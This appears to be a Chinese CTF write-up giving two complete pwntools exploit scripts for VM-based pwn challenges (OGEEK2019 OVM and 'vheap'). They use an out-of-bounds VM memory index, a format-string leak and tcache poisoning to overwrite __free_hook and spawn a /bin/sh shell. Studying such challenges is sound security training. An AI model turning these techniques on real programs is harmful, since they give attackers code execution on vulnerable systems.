vm pwn例题
OGEEK2019_FINAL_OVM
数组溢出
from pwn import *
context.log_level='debug'
p = process("vmpwn")
elf = ELF("vmpwn")
libc = elf.libc
s = lambda data :p.send(data)
sa = lambda text,data :p.sendafter(text, str(data))
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, str(data))
r = lambda num=4096 :p.recv(num)
ru = lambda text :p.recvuntil(text)
uu32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
uu64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg = lambda name,data :p.success(name + "-> 0x%x" % data)
def opcode(code, dst, op1, op2):
res = code<<24
res += dst<<16
res += op1<<8
res += op2
return str(res)
p.recvuntil("PC: ")
p.sendline('0')
p.recvuntil("SP: ")
p.sendline('1')
p.recvuntil("CODE SIZE: ")
p.sendline('24')
p.recvuntil("CODE: ")
# 将stderr_got表里存的_IO_2_1_stderr的地址转递给reg[3]reg[2]
sl(opcode(0x10, 0, 0, 26)) #reg[0] = 26
sl(opcode(0x80, 1, 1, 0)) #reg[1] = -26
sl(opcode(0x30, 2, 0, 1)) #reg[2] = memory[reg[1]]
sl(opcode(0x10, 0, 0, 25)) #reg[0] = 25
sl(opcode(0x10, 1, 0, 0)) #reg[1] = 0
sl(opcode(0x80, 1, 1, 0)) #reg[1] = -25
sl(opcode(0x30, 3, 0, 1)) #reg[3] = memory[reg[1]]
# reg[4]构造一个0x10a0,给reg[2]加上,即_IO_2_1_stderr+0x10a0=free_hook-8
sl(opcode(0x10, 4, 0, 1)) #reg[4] = 1
sl(opcode(0x10, 5, 0, 12)) #reg[5] = 12
sl(opcode(0xc0, 4, 4, 5)) #reg[4] = 1<<12 = 1000
sl(opcode(0x10, 5, 0, 0xa)) #reg[5] = 0xa
sl(opcode(0x10, 6, 0, 4)) #reg[6] = 4
sl(opcode(0xc0, 5, 5, 6)) #reg[5] = 0xa0
sl(opcode(0x70, 4, 4, 5)) #reg[4] = reg[4]+reg[5] = 0x10a0
sl(opcode(0x70, 2, 4, 2)) #reg[2] = reg[4]+reg[2]
# 将comment改为free_hook-8
sl(opcode(0x10, 4, 0, 8)) #reg[4] = 8
sl(opcode(0x10, 1, 0, 0)) #reg[1] = 0
sl(opcode(0x80, 1, 1, 4)) #reg[1] = 0-8 = -8
sl(opcode(0x40, 2, 0, 1)) #memory[reg[1] = reg[2]]
sl(opcode(0x10, 5, 0, 7)) #reg[5] = 7
sl(opcode(0x10, 1, 0, 0)) #reg[1] = 0
sl(opcode(0x80, 1, 1, 5)) #reg[1] = reg[1] - reg[4] = -7
sl(opcode(0x40, 3, 0, 1)) #memory[reg[1]] = reg[3]
sl(opcode(0xe0, 0, 0, 0)) #exit
ru('R2: ')
low = int(r(8), 16) + 8
ru('R3: ')
high = int(r(4), 16)
print hex(low), hex(high)
libc_base = (high<<32) + low - libc.sym['__free_hook']
lg('libc_base', libc_base)
system = libc_base + libc.sym['system']
# 读入comment,修改到free_hook
sl('/bin/sh\x00'+p64(system))
p.interactive()
vheap
堆溢出修改fd
from pwn import *
from pwnlib.util.packing import u64
from pwnlib.util.packing import p64
context(os='linux', arch='amd64', log_level='debug')
p=process('/home/zp9080/PWN/vheap')
elf=ELF('/home/zp9080/PWN/vheap')
libc=ELF('/home/zp9080/PWN/libc-2.27.so')
def dbg():
gdb.attach(p,'b *$rebase(0xEC6 )')
pause()
s = lambda data :p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
ru = lambda text :p.recvuntil(text)
uu64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
lg = lambda name,data :p.success(name + "-> 0x%x" % data)
pay = '%20$p'
sla("first,tell me your name.",pay)
p.recvuntil("welcome:")
libc_base = int(p.recv(14),16)-231-libc.sym['__libc_start_main']
lg('libc_base',libc_base)
free_hook = libc_base+libc.sym['__free_hook']
one = libc_base+0x4f302
sla("How many pieces of data?\n",'2')
s(b'a'*0x18+p64(0x70)+p64(free_hook))
s(p64(one))
p.recvuntil("Size:\n")
s('9')
def pack(code, dst, op2, op1):
res = code<<24
res += dst<<16
res += op2<<8
res += op1
return str(res)
p.recvuntil("[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++]")
p.sendline(pack(0xa,0,0x10,0))
p.sendline(pack(0xa,0,0x60,1))
p.sendline(pack(0xa,0,0x60,2))
p.sendline(pack(0xc,0,0,1))
#直接打tcache poison
p.sendline(pack(0xb,0,0,0))# memcpy
p.sendline(pack(0xa,0,0x60,0))
p.sendline(pack(0xa,0,0x60,1))
p.sendline(pack(0xb,1,0,1))
p.sendline(pack(0xc,0,0,2))
p.interactive()
'''
0x4f2a5 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
0x4f302 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a2fc execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''